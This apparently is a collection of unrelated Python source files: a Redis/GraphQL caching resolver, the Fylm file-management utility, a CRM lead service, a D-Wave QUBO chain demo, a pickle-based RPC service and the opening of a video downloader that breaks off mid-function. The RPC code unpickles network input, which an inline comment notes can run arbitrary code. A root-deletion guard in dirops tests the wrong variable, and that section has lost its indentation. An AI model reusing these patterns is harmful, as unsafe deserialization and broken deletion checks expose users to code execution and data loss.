                group_object = [article, tags_object]
                con.set(article_redis, pickle.dumps(group_object))
            con.zadd('article_like', score_member)
            con.expire('article_like', 60*60*24)
        article_list = con.zrevrange('article_like', 0, -1, withscores=True)
        result = []
        for i, score in article_list:
            result.append(test_article(con, i)[0])
        return result

    @login_required
    def resolve_Get_all_tags(self, info):
        """
        TagList lives in MySQL, but articles are read from Redis and the big
        article table has no tag column, so Redis keeps ArticleTag entries
        for each article's tags; adding a tag also updates the cached
        article list. Since tags are added by tag_id, keeping the tag table
        in Redis lets us find a tag object in O(1) instead of an O(log n)
        MySQL lookup.
        :param info:
        :return:
        """
        # In Redis, tag_list is a hash with key 'tag_list':
        # field1 tag_id1 value1 pickle.dumps(tag_object1) ....
        cn = get_redis_connection()
        tag_list_redis = cn.hvals('tag_list')
        if tag_list_redis:
            return [pickle.loads(tag) for tag in tag_list_redis]
        tag_list_mysql = TagList.objects.all()
        cn.hmset('tag_list', {tag.id: pickle.dumps(tag)for tag in tag_list_mysql})
        return tag_list_mysql
class Mutation(graphene.ObjectType):
    """Root mutation: create/publish articles, like, and tag."""
    Create_article = CreateArticle.Field()
    Up_vote = LikeArticle.Field()
    Add_tag = AddTag.Field()
|
# -*- coding: future_fstrings -*-
# Copyright 2018 Brandon Shelley. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""File/directory and size utilities for Fylm operations
A collection of class methods that handles file system CRUD operations, like
get, move, rename, and delete. Also includes filesize detector methods.
dirops: directory operations exported by this module.
fileops: file operations exported by this module.
size: file and dir size calculator
"""
from __future__ import unicode_literals, print_function
from builtins import *
import os
import shutil
import sys
import unicodedata
import itertools
from itertools import islice
from multiprocessing import Pool
import fylmlib.config as config
from fylmlib.console import console
from fylmlib.cursor import cursor
import fylmlib.formatter as formatter
class dirops:
"""Directory-related class method operations.
"""
_existing_films = None
@classmethod
def verify_root_paths_exist(cls, paths):
    """Verify that each path in *paths* exists.

    Checks every entry and reports a console error for any that is
    missing. Primarily used at app initiation time to verify that
    source and destination paths are in working order.

    Args:
        paths: (list) paths to verify existence.
    """
    for d in paths:
        if os.path.exists(d):
            continue
        console.error(f"'{d}' does not exist; check source path in config.yaml")
@classmethod
def is_same_partition(cls, f1, f2):
    """Determine if f1 and f2 are on the same partition.

    Args:
        f1: (str, utf-8) path of source file/folder
        f2: (str, utf-8) path of destination file/folder

    Returns:
        True, if f1 and f2 are on the same parition, or force_move is
        True, else False.
    """
    if config.force_move is True:
        return True
    # Climb each path to its nearest existing ancestor before stat'ing.
    while not os.path.exists(f1):
        f1 = os.path.dirname(f1)
    while not os.path.exists(f2):
        f2 = os.path.dirname(f2)
    dev_a = os.stat(os.path.dirname(f1)).st_dev
    dev_b = os.stat(os.path.dirname(f2)).st_dev
    return dev_a == dev_b
@classmethod
def get_existing_films(cls, paths):
"""Get a list of existing films.
Scan one level deep of the target paths to get a list of existing films. Since
this is used exclusively for duplicate checking, this method is skipped when
duplicate checking is disabled.
Args:
paths: (dict) a set of unicode paths to search for existing films.
Must be passed in the form of: { "<quality>": "<path>" }
Returns:
A list of existing Film objects.
"""
# If existing films has already been loaded and the list has
# more than one film:
if cls._existing_films is not None and len(cls._existing_films) > 0:
return cls._existing_films
# Import Film here to avoid circular import conflicts.
from fylmlib.film import Film
# If check_for_duplicates is disabled, we don't care about duplicates, and
# don't need to spend cycles processing duplicates. Return an empty array.
if config.duplicates.enabled is False:
return []
# Fix paths being a str
if isinstance(paths, str):
paths = { 'default': paths }
# Enumerate the destination directory and check for duplicates.
console.debug('Loading existing films from disk...')
cls._existing_films = []
# Map a list of valid and sanitized files to Film objects by iterating
# over paths for 720p, 1080p, 4K, and SD qualities.
for path in list(set(os.path.normpath(path) for _, path in paths.items())):
if os.path.normpath(path) not in config.source_dirs:
xfs = [os.path.normpath(os.path.join(path, file)) for file in cls.sanitize_dir_list(os.listdir(path))]
with Pool(processes=25) as pool:
cls._existing_films += pool.map(Film, xfs)
# Strip bad duplicates
cls._existing_films = list(filter(lambda x: x.should_ignore is False, cls._existing_films))
files_count = list(itertools.chain(*[f.video_files for f in cls._existing_films]))
console.debug(f'Loaded {len(cls._existing_films)} existing unique Film objects containing {len(files_count)} video files')
# Uncomment for verbose debugging. This can get quite long.
# for f in sorted(cls._existing_films, key=lambda s: s.title.lower()):
# console.debug(f' - {f.source_path} {f.all_valid_films}')
# Sort the existing films alphabetically, case-insensitive, and return.
return sorted(cls._existing_films, key=lambda s: s.title.lower())
@classmethod
def get_new_films(cls, paths):
"""Get a list of new potenial films we want to tidy up.
Scan one level deep of the target path to get a list of potential new files/folders.
Args:
paths: (List[str, utf-8]) paths to search for new films.
Returns:
An array of potential films.
"""
# Import Film here to avoid circular import conflicts.
from fylmlib.film import Film
films = []
# Convert to a list if paths is not already (safety check)
if isinstance(paths, str):
paths = [paths]
for path in paths:
# Check if the source path is a single file (usually because of the -s switch)
if len(paths) == 1 and os.path.exists(path) and os.path.isfile(path):
films.append([Film(path)])
break
# Enumerate the search path(s) for files/subfolders, then sanitize them.
# If using the `limit` option, create a sliced list to limit the number of
# files to be processed.
raw_films = islice(cls.sanitize_dir_list(os.listdir(
path)), config.limit if config.limit > 0 else None)
# Map the list to Film objects and extend the films list
films.extend(
list(map(Film, [os.path.join(path, file) for file in raw_films])))
# Sort the resulting list of files alphabetically, case-insensitive.
films.sort(key=lambda x: x.title.lower())
return list(films)
@classmethod
def get_valid_files(cls, path) -> [str]:
"""Get a list valid files inside the specified path.
Scan deeply in the specified path to get a list of valid files, as
determined by the config.video_exts and config.extra_exts properties.
Args:
path: (str, utf-8) path to search for valid files.
Returns:
An array of valid file paths.
"""
# Call dirops.find_deep to search for files within the specified path.
# Filter the results using a lambda function.
valid_files = cls.find_deep(path, lambda x:
# A valid file must have a valid extension
fileops.has_valid_ext(x)
# It must not contain an ignored string (e.g. 'sample')
and not fileops.contains_ignored_strings(x)
# And it must be at least a certain filesize if it is a film,
# or not 0 bytes if it's a supplementary file.
and fileops.is_acceptable_size(x))
# If debugging, print the resulting list of files and sizes.
# This is a very noisy output, so is commented out.
# if config.debug is True:
# import inspect
# for f in list(set(valid_files)):
# console.debug(f'\n`{inspect.stack()[0][3]}`' \
# f' found "{os.path.basename(f)}"' \
# f' ({formatter.pretty_size(size(f))})' \
# f' \nin {path}')
return sorted(valid_files, key=os.path.getsize, reverse=True)
@classmethod
def get_invalid_files(cls, path):
"""Get a list of invalid files inside the specified dir.
Scan deeply in the specified dir to get a list of invalid files, as
determined by the config.video_exts and config.extra_exts properties.
We do not check filesize here, because while we may not want to
rename and move vide/extra files that are too small, we probably
don't want to delete them.
Args:
path: (str, utf-8) path to search for invalid files.
Returns:
An array of invalid files.
"""
# Call dir.find_deep to search for files within the specified dir.
# Filter the results using a lambda function.
return cls.find_deep(path, lambda x:
# An invalid file might contain an ignored string (e.g. 'sample')
fileops.contains_ignored_strings(x)
# Or it may not have a valid file extension
or not fileops.has_valid_ext(x)
# Or if it does, it might not be large enough
or not fileops.is_acceptable_size(x))
@classmethod
def sanitize_dir_list(cls, files):
"""Sanitize a directory listing using unicode normalization and by
omitting system files.
On macOS, unicode normalization must take place for loading files with
unicode chars. This method correctly normalizes these strings.
It also will remove .DS_Store and Thumbs.db from the list, since we
don't ever care to count, or otherwise observe, these system files.
Args:
files: (str, utf-8) list of files in dir.
Returns:
A sanitized, unicode-ready array of files.
"""
return list(filter(lambda f:
not any([f.lower() in map(lambda x: x.lower(), config.ignore_strings)])
and not f.endswith('.DS_Store') and not f.endswith('Thumbs.db'),
[unicodedata.normalize('NFC', file) for file in files]))
@classmethod
def create_deep(cls, path):
"""Deeply create the specified path and any required parent paths.
Using recursion, create a directory tree as specified in the path
param.
Args:
path: (str, utf-8) path to create.
"""
# Because this is a destructive action, we will not create the
# path tree if running in test mode.
if not config.test:
# If the path exists, there's no point in trying to create it.
if not os.path.exists(path):
try:
console.debug(f'Creating destination {path}')
os.makedirs(path)
# If the dir creation fails, raise an Exception.
except OSError as e:
console.error(f'Unable to create {path}', OSError)
@classmethod
def find_deep(cls, root_dir, func=None):
"""Deeply search the specified dir and return all files.
Using recursion, search the specified path for files.
Pass an optional function to filter results.
Args:
root_path: (str, utf-8) path to search for files.
func: (function) user-defined or lambda function to use as a filter.
Returns:
A filtered list of files.
"""
# Use os.walk() to recursively search the dir and return full path of each file.
results = [os.path.join(root, f) for root, dirs, files in os.walk(root_dir) for f in files]
# Sanitize the resulting file list, then call the (optional) filter function that was passed.
return list(filter(func, cls.sanitize_dir_list(results)))
@classmethod
def delete_dir_and_contents(cls, path, max_size=50*1024):
"""Recursively delete dir path and all its contents, if less than max_size.
Using recursion, delete all files and folders in the specified dir and
itself if the total dir size is less than max_size (default 50 KB).
Args:
path: (str, utf-8) path to be recursively deleted.
max_size: (int) optional max size in Bytes a folder can be to qualify for deletion. Default=50000.
"""
# Get count of files
files_count = len(cls.find_deep(path))
# First we ensure the dir is less than the max_size threshold, otherwise abort.
if _size_dir(path) < max_size or max_size == -1 or files_count == 0:
console.debug(f'Recursively deleting {path}')
# An emergency safety check in case there's an attempt to delete / (root!) or one of the source_paths.
if dir == '/' or dir in config.source_dirs:
raise OSError(f"Somehow you tried to delete '{path}' by calling delete.dir_recursive()... Don't do that!")
# Otherwise, only perform destructive actions if we're running in live mode.
elif config.test is False:
try:
shutil.rmtree(path)
# Catch resource busy error
except OSError as e:
if e.args[0] == 16:
console.error(f'Tried to remove "{path}" but file is in use')
elif config.test is False:
console().red().indent(
f"Will not delete {path} ({'not empty' if files_count > 0 else formatter.pretty_size(max_size)})"
)
@classmethod
def delete_unwanted_files(cls, path):
"""Delete all unwanted files in the specified dir.
Using recursion, delete all invalid (unwanted) files and folders in the specified dir,
keeping track of the number of files that were deleted.
This could be dangerous, be careful not to accidentally run it on something like... /
Args:
path: (str, utf-8) root path where contents will be deleted.
count: (int) optional current number of deleted files (in case this is called multiple times
Returns:
Number of files that were deleted successfully.
"""
deleted_files = 0
# Only perform destructive actions if in live mode.
if not config.test:
# Only delete unwanted files if enabled in config
if config.remove_unwanted_files:
# Search for invalid files, enumerate them, and delete them.
for f in [f for f in cls.get_invalid_files(path) if os.path.isfile(f)]:
# Increment deleted_files if deletion was successful.
# `fileops.delete` has test check built in, so
# no need to check here.
deleted_files += fileops.delete(f)
return deleted_files
class fileops:
    """File-related class method operations."""

    @classmethod
    def has_valid_ext(cls, path):
        """Check if file has a valid extension.

        Check the specified file's extension against config.video_exts and
        config.extra_exts.

        Args:
            path: (str, utf-8) path of file to check.
        Returns:
            True if the file has a valid extension, else False.
        """
        return any([path.endswith(ext) for ext in config.video_exts + config.extra_exts])

    @classmethod
    def is_acceptable_size(cls, file_path):
        """Determine if a file_path is an acceptable size.

        Args:
            file_path: (str, utf-8) path to file.
        Returns:
            True, if the file is an acceptable size, else False.
        """
        s = size(file_path)
        # Renamed from `min`, which shadowed the builtin.
        min_size = cls.min_filesize_for_resolution(file_path)
        is_video = any([file_path.endswith(ext) for ext in config.video_exts])
        is_extra = any([file_path.endswith(ext) for ext in config.extra_exts])
        # Videos must meet the (MB) threshold; extras only need to be non-negative.
        return ((s >= min_size * 1024 * 1024 and is_video)
                or (s >= 0 and is_extra))

    @classmethod
    def min_filesize_for_resolution(cls, file_path):
        """Determine the minimum filesize for the resolution for file path.

        Args:
            file_path: (str, utf-8) path to file.
        Returns:
            int: The minimum file size (MB), or the configured default if the
            resolution could not be determined.
        """
        # Renamed from `min`, which shadowed the builtin.
        min_size = config.min_filesize
        # A plain int applies to all resolutions.
        if isinstance(min_size, int):
            return min_size
        # If the min filesize is not an int, we assume
        # that it is an AttrMap of resolutions.
        from fylmlib.parser import parser
        res = parser.get_resolution(file_path)
        if res is None:
            return min_size.default
        if res == '720p' or res == '1080p' or res == '2160p':
            return min_size[res]
        elif res.lower() == 'sd' or res.lower() == 'sdtv':
            return min_size.SD
        else:
            return min_size.default

    @classmethod
    def safe_move(cls, src: str, dst: str, ok_to_upgrade = False):
        """Performs a 'safe' move operation.

        Performs some additional checks before moving files. Optionally supports
        config.safe_copy, which forcibly copies files from one folder to the next
        instead of moving them, even if the files exist on the same partition.

        Args:
            src: (str, utf-8) path of file to move.
            dst: (str, utf-8) destination for file to move to.
            ok_to_upgrade: (Bool) True if this file is OK to replace an existing one
                           as determined by checking for identical duplicates
                           that meet upgrade criteria.
        Returns:
            True if the file move was successful, else False.
        """
        # Abort if src does not exist in live mode. We can't raise this error in
        # test mode, because the file would never have been renamed.
        if not os.path.exists(src) and config.test is False:
            raise OSError(f'Path does not exist: {src}')
        # Silently abort if the src and dst are the same.
        if src == dst:
            console.debug('Source and destination are the same, nothing to move')
            return False
        # Try to create destination folders if they do not exist.
        dirops.create_deep(os.path.dirname(dst))
        console.debug(f"\n  Moving: '{src}'")
        console.debug(f"      To: '{dst}'\n")
        # Check if a file already exists with the same name as the one we're moving.
        # By default, abort here (otherwise shutil.move would silently overwrite it)
        # and print a warning to the console. If force_overwrite is enabled,
        # proceed anyway, otherwise forcibly prevent accidentally overwriting files.
        # If the function was called with a Should property, we can skip this if it's
        # marked for upgrade.
        if os.path.exists(dst) and not ok_to_upgrade:
            # If force_overwrite is turned off, we can't overwrite this file.
            # If interactive is on, the user has some more flexibility and can choose to
            # overwrite, so we can skip this.
            if config.duplicates.force_overwrite is False and config.interactive is False:
                # If we're not overwriting, return false
                console().red().indent(f"Unable to move; a file with the same name already exists in '{os.path.dirname(dst)}'").print()
                return False
            # File overwriting is enabled and not marked to upgrade, so warn but continue
            console().yellow().indent(f"Replacing existing file in '{os.path.dirname(dst)}'").print()
        # Handle macOS (darwin) converting / to : on the filesystem reads/writes.
        # Credit: https://stackoverflow.com/a/34504896/1214800
        if sys.platform == 'darwin':
            dst = os.path.join(os.path.dirname(dst), os.path.basename(dst).replace(r'/', '-'))
        # Only perform destructive changes if running in live mode, so we can short-circuit
        # the rest by returning True here and presuming it was successful.
        if config.test is True:
            return True
        try:
            # If we're overwriting, first try and rename the existing (identical)
            # duplicate so we don't lose it if the move fails
            if os.path.exists(dst):
                os.rename(dst, f'{dst}.dup')
            # If safe_copy is enabled, or if partition is not the same, copy instead.
            if config.safe_copy is True or not dirops.is_same_partition(src, dst):
                # Store the size of the source file to verify the copy was successful.
                expected_size = size(src)
                # Generate a new filename using .partial~ to indicate the file
                # has not been completely copied.
                partial_dst = f'{dst}.partial~'
                # Copy the file using progress bar
                cls.copy_with_progress(src, partial_dst)
                # Verify that the file is within one byte of the original.
                dst_size = size(partial_dst)
                if abs(dst_size - expected_size) <= 1:
                    os.rename(partial_dst, partial_dst.rsplit('.partial~', 1)[0])
                    os.remove(src)
                # If not, then we print an error and return False.
                else:
                    console().red().indent(f"Size mismatch; file is {dst_size:,} bytes, expected {expected_size:,} bytes")
                    return False
            # Otherwise, move the file instead.
            else:
                shutil.move(src, dst)
            # Clean up any backup duplicate that might have been created, if the move was successful
            if os.path.exists(dst) and os.path.exists(f'{dst}.dup'):
                os.remove(f'{dst}.dup')
            return True
        except (IOError, OSError) as e:
            # Catch exception and soft warn in the console (don't raise Exception).
            console().red().indent(f'Failed to move {src} to {dst}')
            # (Removed a stray `print(e)` that duplicated this debug output.)
            console.debug(e)
            # If we're overwriting and a duplicate was created, undo its renaming
            if os.path.exists(f'{dst}.dup'):
                os.rename(f'{dst}.dup', dst)
            return False

    @classmethod
    def copy_with_progress(cls, src, dst, follow_symlinks=True):
        """Copy data from src to dst and print a progress bar.

        If follow_symlinks is not set and src is a symbolic link, a new
        symlink will be created instead of copying the file it points to.

        Args:
            src: (str, utf-8) path to source file.
            dst: (str, utf-8) path to destination.
            follow_symlinks: (bool) follows symbolic links to files and re-creates them.
        """
        # Local import; only needed for the FIFO check below. The original code
        # reached it via `shutil.stat`, relying on shutil's internal import.
        import stat as stat_module
        # Hide the cursor
        cursor.hide()
        # If the destination is a folder, include the folder
        # in the destination copy.
        if os.path.isdir(dst):
            dst = os.path.join(dst, os.path.basename(src))
        # If the source and destination are the same, abort.
        # (Replaces the private shutil._samefile API with equivalent logic.)
        try:
            if os.path.samefile(src, dst):
                return
        except OSError:
            # One of the two paths doesn't exist; fall back to comparing paths.
            if (os.path.normcase(os.path.abspath(src)) ==
                    os.path.normcase(os.path.abspath(dst))):
                return
        for fn in [src, dst]:
            try:
                st = os.stat(fn)
            except OSError:
                # File most likely does not exist.
                pass
            else:
                # Refuse to copy named pipes; reading one would block forever.
                if stat_module.S_ISFIFO(st.st_mode):
                    raise shutil.SpecialFileError(f"`{fn}` is a named pipe")
        # Handle symlinks.
        if not follow_symlinks and os.path.islink(src):
            os.symlink(os.readlink(src), dst)
        else:
            # Renamed from `size`, which shadowed this module's size() function.
            total_size = os.stat(src).st_size
            with open(src, 'rb') as fsrc:
                with open(dst, 'wb') as fdst:
                    cls._copyfileobj(fsrc, fdst, callback=console().print_copy_progress_bar, total=total_size)
        # Copy permission bits to the destination.
        shutil.copymode(src, dst)
        # Show the cursor.
        cursor.show()
        # Clear the progress bar from the console.
        console.clearline()

    @classmethod
    def _copyfileobj(cls, fsrc, fdst, callback, total, length=16*1024):
        """Internal method for low-level copying.

        Executes low-level file system copy and calls back progress
        to progress bar function.

        Args:
            fsrc: (file) open source file object.
            fdst: (file) open destination file object.
            callback: (function) callback function to be called when progress is changed.
            total: (int) total expected size of file in B.
            length: (int) buffer size for each read.
        """
        copied = 0
        while True:
            buf = fsrc.read(length)
            if not buf:
                break
            fdst.write(buf)
            copied += len(buf)
            callback(copied, total=total)

    @classmethod
    def rename(cls, src, new_filename_and_ext):
        """Renames a file using shutil.move.

        Renames a file using shutil.move, which under the hood, intelligently
        determines whether or not to use os.rename or shutil.copy. Normally this
        wouldn't matter, but this allows the function to be flexible enough to
        support src/dst being on different partitions.

        Args:
            src: (str, utf-8) full path (including filename) of file to move.
            new_filename_and_ext: (str, utf-8) new filename.ext (not including path).
        """
        # Handle macOS (darwin) converting / to : on the filesystem reads/writes.
        # If we don't do this, the filesystem will try and create a new folder instead
        # of the correct filename.
        # Credit: https://stackoverflow.com/a/34504896/1214800
        new_filename_and_ext = new_filename_and_ext.replace(r'/', '-')
        # Generate a destination string based on src's path and the new filename
        dst = os.path.normpath(os.path.join(os.path.dirname(src), new_filename_and_ext))
        # Silently abort if the src==dst (we don't need to waste cycles renaming files
        # that are already correctly named). This also allows us to check for identically
        # named files that may already exist, in order to not overwrite them.
        if src == dst:
            return
        # Check if a file already exists (case sensitive) with the same name as the
        # one we're renaming. If it does, abort (otherwise shutil.move would
        # silently overwrite it) and print a warning to the console.
        if os.path.exists(dst) and os.path.basename(src) == os.path.basename(dst):
            console().red().indent(f'Unable to rename {dst} (identical file already exists)')
            return
        console.debug(f'Renaming: {src}')
        console.debug(f'      To: {dst}')
        # Only perform destructive changes if we're in live mode.
        if not config.test:
            # Rename the file using shutil.move (instead of os.rename), so the
            # operation also works when src/dst are on different partitions.
            # Fixed: the code previously called os.rename despite this comment.
            shutil.move(src, dst)

    @classmethod
    def contains_ignored_strings(cls, path):
        """Determines if a file contains any of the ignored substrings (e.g. 'sample').

        Checks a path string and determines if it contains any of the forbidden
        substrings. A word of caution: if you add anything common to the config,
        you may prevent some files from being moved.

        Args:
            path: (str, utf-8) full path (including filename) of file to check for ignored strings.
        Returns:
            True if any of the ignored strings are found in the file path, else False.
        """
        return any(word.lower() in path.lower() for word in config.ignore_strings)

    @classmethod
    def delete(cls, file):
        """Deletes a file.

        Attempts to delete the specified file, and returns a number that can be
        used to increment a counter if the deletion was successful.

        Args:
            file: (str, utf-8) full path (including filename) of file to delete.
        Returns:
            1 if the deletion succeeded (or test mode is on), else 0.
        """
        console.debug(f"Deleting file {file}")
        # If we're running in test mode, return a mock success (we assume the deletion
        # would have been successful had it actually run).
        if config.test:
            return 1
        # Only perform destructive changes if running in live mode.
        try:
            # Try to remove the file
            os.remove(file)
            # If successful, return 1, for a successful op.
            return 1
        except Exception:
            # Handle any exceptions gracefully and warn the console.
            console().red().indent(f'Unable to remove {file}')
            # Return 0 because we don't want a success counter to increment.
            return 0
def largest_video(path):
    """Determine the largest video file in dir.

    Args:
        path: (str, utf-8) file or folder to determine size of video file.
    Returns:
        Path of largest video file, or None if path does not exist.
    """
    # A nonexistent path has no video files at all.
    if not os.path.exists(path):
        return None
    # A plain file is trivially its own "largest video".
    if not os.path.isdir(path):
        return path
    # Keep only files whose extension is configured as a video extension.
    candidates = [
        f for f in dirops.get_valid_files(path)
        if os.path.splitext(f)[1] in config.video_exts
    ]
    if not candidates:
        # Nothing matched; the dir contains no recognizable video files.
        return None
    # max() with a size key replaces the sort-then-take-first approach.
    return max(candidates, key=os.path.getsize)
def size(path) -> int:
    """Determine the size of a file or dir.

    Args:
        path: (str, utf-8) file or folder to determine size.
    Returns:
        Size of file or folder, in bytes (B), or None if path is None.
    Raises:
        Exception: if the path is not None but does not exist on disk.
    """
    # Guard clauses replace the original nested if/else structure.
    if path is None:
        return None
    if not os.path.exists(path):
        raise Exception(f'Cannot calculate size for a path that does not exist ({path})')
    # Directories are measured by recursively summing their contents.
    if os.path.isdir(path):
        return _size_dir(path)
    # Regular files report their own size directly.
    return os.path.getsize(path)
def _size_dir(path):
    """Determine the total size of a directory.

    Determine the size of directory at the specified path by recursively
    summing the size of every file contained within.

    Args:
        path: (str, utf-8) folder to determine size.
    Returns:
        Combined size of folder, in bytes (B), or None if dir does not exist.
    """
    if not os.path.exists(path):
        return None
    # Walk the whole tree and sum every regular file's size; an empty tree
    # naturally sums to 0, matching the original accumulator behavior.
    return sum(
        os.path.getsize(file_path)
        for root, _dirs, files in os.walk(path)
        for file_path in (os.path.join(root, name) for name in files)
        if os.path.isfile(file_path)
    )
|
import datetime
from app.main import db
from app.main.model.lead import Lead
from app.main.model.status import Status
from app.main.service.business_rules import is_valid_status_change, need_new_customer, need_to_book_meeting
from app.main.service.customer_service import save_new_customer
from app.main.service.opportunity_service import save_new_opportunity, change_all_opportunities_description
def get_all_leads():
    """Return every Lead row in the database as a list."""
    return Lead.query.all()
def get_lead_by_id(id):
    """Fetch a single Lead by primary key, or None if not found."""
    # Note: the parameter name `id` shadows the builtin but is part of the API.
    return Lead.query.get(id)
def save_new_lead(data):
    """Create a Lead in the initial status and register its opportunities.

    Expects `data` to carry customer_name, customer_phone, customer_email and
    an 'oportunities' list. Returns a (response dict, 201) tuple.
    """
    # Status id 1 is the entry point of the pipeline for every new lead.
    initial_status = Status.query.get(1)
    lead = Lead(data['customer_name'], data['customer_phone'], data['customer_email'], initial_status)
    initial_status.leads.append(lead)
    save_changes(initial_status)
    # Persist each opportunity attached to the incoming payload.
    for opportunity_data in data['oportunities']:
        save_new_opportunity(lead, opportunity_data)
    return {
        'method': 'save_new_lead',
        'status': 'success',
        'message': 'Successfully registered.'
    }, 201
def delete_all_leads():
    """Delete every Lead row, committing once after all deletes are staged."""
    # Renamed the loop source from `all`, which shadowed the builtin.
    for lead in Lead.query.all():
        db.session.delete(lead)
    db.session.commit()
def change_lead_status(data):
    """Move a lead to a new status, applying the pipeline's business rules.

    Expects `data` with an 'id' (lead), a 'status' (target status id), and -
    when the target status requires booking a meeting - a 'date'.

    Returns:
        (response dict, HTTP status): 201 on success, 404 when the lead or
        the target status is missing, or when the transition is not allowed.
    """
    lead = get_lead_by_id(data['id'])
    if lead is None:
        response_object = {
            'method': 'change_lead_status',
            'status': 'fail',
            'message': 'Lead not found.'
        }
        return response_object, 404
    old_status = lead.status
    new_status = Status.query.filter_by(id=data['status']).first()
    if new_status is None:
        response_object = {
            'method': 'change_lead_status',
            'status': 'fail',
            'message': 'New status not found.'
        }
        return response_object, 404
    # Business rules decide whether this transition is legal and whether it
    # triggers side effects (customer creation, meeting booking).
    if is_valid_status_change(old_status, new_status):
        # Re-home the lead: remove from the old status' collection first,
        # then append to the new one.
        old_status.leads.remove(lead)
        new_status.leads.append(lead)
        if(need_new_customer(new_status)):
            save_new_customer(lead)
        if(need_to_book_meeting(new_status)):
            # Assumes data["date"] is already a datetime object -- TODO confirm
            # against the API schema (a raw JSON payload would carry a string).
            date = data["date"].strftime("%m/%d/%Y %H:%M")
            # NOTE(review): this appends the booking note to *all* opportunities,
            # not only this lead's -- confirm that is intended.
            change_all_opportunities_description(" Agendado: "+ date)
        # Persist both sides of the move.
        save_changes(old_status)
        save_changes(new_status)
        response_object = {
            'method': 'change_lead_status',
            'status': 'success',
            'message': 'Status successfully changed.'
        }
        return response_object, 201
    else:
        response_object = {
            'method': 'change_lead_status',
            'status': 'fail',
            'message': 'Fail to change status.'
        }
        return response_object, 404
def save_changes(data):
    """Stage *data* on the SQLAlchemy session and commit immediately."""
    db.session.add(data)
    db.session.commit()
|
from utils.data import read_inventory_optimization_data
class Chain(list):
    """An ordered pipeline of QUBO problems, solved one after another."""

    def __init__(self) -> None:
        super().__init__()

    def process_single_qubo(self, index, sampler, **kwargs):
        """Solve only the qubo at *index* with the given sampler and kwargs."""
        qubo = self[index]
        qubo.solve(sampler, **kwargs)

    def process_best(self, samplers: list, sampler_params: list):
        """Processes the chain but only passes the best solutions forward

        Args:
            samplers - list of samplers to use, must be same length as self
            sampler_params - list of parameters to use for the samplers, must be same length as self
        """
        previous_qubo = None
        # Fixed: the loop variable was previously also named `sampler_params`,
        # shadowing (and rebinding) the parameter; renamed to `params`.
        for qubo, sampler, params in zip(self, samplers, sampler_params):
            if previous_qubo is None:
                # First qubo in the chain: nothing to feed forward yet.
                qubo.solve(sampler, **params)
                previous_qubo = qubo
                continue
            # Feed the previous qubo's post-processed best solution into this one.
            next_iteration_data = previous_qubo.post_process[0]
            print('Starting next iteration with data', next_iteration_data)
            qubo.build(**next_iteration_data)
            qubo.solve(sampler, **params)
            previous_qubo = qubo
if __name__ == "__main__":
    # Demo: chain a supplier-selection QUBO into a profit QUBO, feeding the
    # suppliers chosen by the first problem into the data for the second.
    from models.ProfitQubo import ProfitQubo
    from models.SupplierQubo import SupplierQubo
    from utils.data import read_profit_optimization_data
    from config import standard_mock_data
    from neal import SimulatedAnnealingSampler
    from dwave.system import LeapHybridDQMSampler
    import numpy as np
    data_file = standard_mock_data['small']
    inventory_requirement, supplier_inventory = read_inventory_optimization_data(data_file)
    qubo0 = SupplierQubo(inventory_requirement, supplier_inventory)
    def get_post_process_inventory_function(data_file:str):
        # Returns a closure bound to data_file so the supplier qubo can turn
        # its binary solution vector into inputs for the profit optimization.
        def post_process_inventory_qubo(solution, energy):
            from utils.data import read_profit_optimization_data
            # Non-zero solution entries identify the selected suppliers.
            hacky_suppliers = [f'supplier{i}' for i in np.where(solution)[0]] # loses the real name, but it's a hackathon.
            profit, cost = read_profit_optimization_data(data_file, hacky_suppliers)
            return dict(
                profits=profit,
                costs=cost
            )
        return post_process_inventory_qubo
    qubo0.define_post_process_function(get_post_process_inventory_function(data_file))
    # Stage 1 runs locally (simulated annealing); stage 2 on the Leap hybrid solver.
    sampler0 = SimulatedAnnealingSampler().sample
    sampler0_params = dict()
    qubo1 = ProfitQubo()
    sampler1 = LeapHybridDQMSampler().sample_dqm
    sampler1_params = dict()
    chain = Chain()
    chain.append(qubo0)
    chain.append(qubo1)
    samplers = [sampler0, sampler1]
    sampler_params = [sampler0_params, sampler1_params]
    chain.process_best(samplers, sampler_params)
|
'''
define the rpc processing logic
'''
import pickle
from .exception import FunctionNotExistError
class Service:
    '''
    Registry of callable handlers plus a pickle-based request/response codec.
    Parses client data and dispatches to the registered functions.
    '''

    def __init__(self):
        # Maps function name -> callable.
        self._function_dict = {}

    def register(self, function_name, function):
        '''
        Expose *function* to clients under *function_name*.
        '''
        self._function_dict[function_name] = function

    def call(self, function_name, *params):
        '''
        Invoke a registered function with the given params.
        Errors are returned (not raised) so they can be packed for the client.
        '''
        try:
            if function_name not in self._function_dict:
                return FunctionNotExistError("the function not in the service")
            handler = self._function_dict[function_name]
            return handler(*params)
        except Exception as err:
            return err

    def result_pack(self, data):
        '''
        Serialize a call result (or a captured exception) for the client.
        '''
        payload = {"error": str(data)} if isinstance(data, Exception) else {"result": data}
        return pickle.dumps(payload)

    def run(self, unpacked_data):
        '''
        Decode one client request, dispatch it, and return the packed reply.
        NOTE(review): pickle.loads on network input is unsafe with untrusted
        clients -- it can execute arbitrary code during deserialization.
        '''
        request = pickle.loads(unpacked_data)
        name, params = request["function_name"], request["params"]
        return self.result_pack(self.call(name, *params))
|
#encoding:utf8
import urllib2
import urllib
import re
import sys
import os
import time
def Schedule(a,b,c):
    """urllib.urlretrieve reporthook: print the download progress percentage.

    a: blocks transferred so far, b: block size in bytes, c: total file size.
    """
    per = 100.0 * a * b / c
    # Clamp: the last block can push the estimate past 100%.
    if per > 100 : per = 100
    # '\r' rewinds to line start so the percentage updates in place.
    sys.stdout.write(u"------进度:%.1f%%\r" % per)
    sys.stdout.flush()
def createDir():
    """Ensure a 'flv' subdirectory exists next to the script; return its path."""
    path = sys.path[0]
    new_path = os.path.join(path,'flv')
    if not os.path.isdir(new_path):
        os.mkdir(new_path)
    return new_path
def getList(id):
    """Fetch video metadata for *id* and return one downloadable media URL.

    Queries yinyuetai's insite API with browser-like headers, then regex-scrapes
    candidate URLs. Prefers the third match (presumably a higher-quality
    stream -- TODO confirm) and falls back to the first. Returns None
    (implicitly) when the request or parsing fails.
    """
    url = "http://www.yinyuetai.com/insite/get-video-info?flex=true&videoId=%d" % id
    headers = {
